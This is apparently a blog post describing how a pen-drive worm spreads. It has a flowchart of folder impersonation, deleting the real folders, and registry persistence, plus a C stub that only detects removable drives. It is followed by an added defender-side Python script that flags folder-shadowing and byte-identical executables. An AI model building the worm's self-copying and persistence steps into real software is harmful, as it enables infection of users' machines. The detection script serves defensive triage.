Have you ever been affected by a pen drive virus?
Did you ever notice that all your folders were replaced by .exe files carrying a folder icon?
How does it work?
It is built from two components:
1. Payload section -> can be a keylogger, data-mining stuff, pots
2. Pen drive distribution
Here is the flow chart:
Virus running (on startup)
|
check whether a pen drive is connected or not
|
check whether it is already infected (why waste CPU?)
|
ensure that our virus is named after all the folders:
if there is a folder named "photos", create our virus under the
name "photos.exe"
|
now the pen drive is removed and the user connects it to another PC ...
looking for the photos folder, fk .. no files
|
our virus is running in the background ->
install the virus (just copy the exe to a secret folder),
make the registry entry to start the virus whenever the PC boots ..
|
done
Only the distribution part is shown here; for the keylogger please refer to the previous post.
#include <windows.h>
#include <string.h>

char Str[4];                          // drive root such as "C:\\" (the original snippet used it undeclared)

VOID CALLBACK TimerProc(HWND hwnd, UINT uMsg, UINT_PTR idEvent, DWORD dwTime)
{
    DWORD a = GetLogicalDrives();     // bit i set => drive letter 'A' + i exists
    for (int i = 0; i < 12; i++)      // 12 drives, more than enough man
    {
        int bit = (a >> i) & 0x1;
        if (!bit)
            continue;                 // this drive letter does not exist
        switch (i)
        {
        case 0:
            continue;                 // skip A:
        case 1:
            strcpy(Str, "B:\\");
            break;
        case 2:
            strcpy(Str, "C:\\");
            break;
        case 3:
            strcpy(Str, "D:\\");
            break;
        case 4:
            strcpy(Str, "E:\\");
            break;
        case 5:
            strcpy(Str, "F:\\");
            break;
        case 6:
            strcpy(Str, "G:\\");
            break;
        case 7:
            strcpy(Str, "H:\\");
            break;
        case 8:
            strcpy(Str, "I:\\");
            break;
        case 9:
            strcpy(Str, "J:\\");
            break;
        case 10:
            strcpy(Str, "K:\\");
            break;
        case 11:
            strcpy(Str, "L:\\");
            break;
        }
        // the drive-type check now runs only for drive letters that actually exist
        if (GetDriveType(Str) == DRIVE_REMOVABLE)   // Me pendrive <- feed me
        {
            // make a self copy
            // delete the folders
        }
    }
}
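The symptom this post describes (every folder on the stick gets a look-alike "photos.exe" next to it, and all of those .exe files are copies of one binary) is also exactly what an incident responder can look for when triaging a suspect pen drive. The following script is an added example written from the defender's side; it is not the post's code. It walks a drive root, flags executables whose name collides with a sibling folder, and groups executables by SHA-256 so that a self-copying worm shows up as a cluster of byte-identical files under different names. The extension list and the constructed demo tree are assumptions for illustration; the post itself only mentions .exe.

```python
"""Triage helper for the "folder replaced by folder.exe" pen drive symptom.
Added example, not part of the original post."""
import hashlib
import os
import tempfile
from collections import defaultdict

# Assumption: extensions a folder-impersonating executable might use; the post only names .exe.
SUSPICIOUS_EXTENSIONS = {".exe", ".scr", ".com", ".pif"}


def sha256_of(path, chunk=65536):
    """Hash a file in chunks so large binaries do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def find_folder_shadows(root):
    """Return sorted (exe_relpath, folder_relpath) pairs where a file such as
    photos.exe sits next to a directory named photos in the same parent."""
    findings = []
    for parent, dirs, files in os.walk(root):
        dir_names = {d.lower(): d for d in dirs}       # case-insensitive, like NTFS/FAT
        rel_parent = os.path.relpath(parent, root)
        for fname in files:
            stem, ext = os.path.splitext(fname)
            if ext.lower() in SUSPICIOUS_EXTENSIONS and stem.lower() in dir_names:
                exe_rel = os.path.normpath(os.path.join(rel_parent, fname))
                dir_rel = os.path.normpath(os.path.join(rel_parent, dir_names[stem.lower()]))
                findings.append((exe_rel, dir_rel))
    return sorted(findings)


def find_identical_executables(root):
    """Group executables by content hash. A worm that copies itself under every
    folder name leaves byte-identical files; return only groups with >1 member."""
    by_hash = defaultdict(list)
    for parent, _dirs, files in os.walk(root):
        for fname in files:
            if os.path.splitext(fname)[1].lower() in SUSPICIOUS_EXTENSIONS:
                full = os.path.join(parent, fname)
                by_hash[sha256_of(full)].append(os.path.normpath(os.path.relpath(full, root)))
    return {digest: sorted(paths) for digest, paths in by_hash.items() if len(paths) > 1}


def build_demo_drive(base):
    """Construct a sample tree (placeholder bytes, not a real infection): two
    folders shadowed by identical .exe files, one unique installer, one text file."""
    for name in ("photos", "docs"):
        os.makedirs(os.path.join(base, name))
        with open(os.path.join(base, name + ".exe"), "wb") as f:
            f.write(b"MZ-constructed-placeholder-same-bytes-under-every-name")
    with open(os.path.join(base, "setup.exe"), "wb") as f:
        f.write(b"MZ-constructed-unique-installer")
    with open(os.path.join(base, "photos", "holiday.txt"), "w") as f:
        f.write("not an executable\n")


def run_demo():
    """Build the constructed tree in a temp dir and return both findings."""
    with tempfile.TemporaryDirectory() as base:
        build_demo_drive(base)
        return find_folder_shadows(base), find_identical_executables(base)


if __name__ == "__main__":
    shadows, clones = run_demo()
    for exe, folder in shadows:
        print(f"suspicious: {exe} shadows folder {folder}")
    for digest, paths in clones.items():
        print(f"identical executables ({digest[:12]}...): {', '.join(paths)}")
```

To use it on a real stick, call `find_folder_shadows("E:\\")` and `find_identical_executables("E:\\")` on a host where the drive is mounted without autorun; the two signals together (name collision plus identical content across names) are a much stronger indicator than either alone, since a single legitimate `setup.exe` next to a `setup` folder is common while a dozen identical executables named after every folder is not.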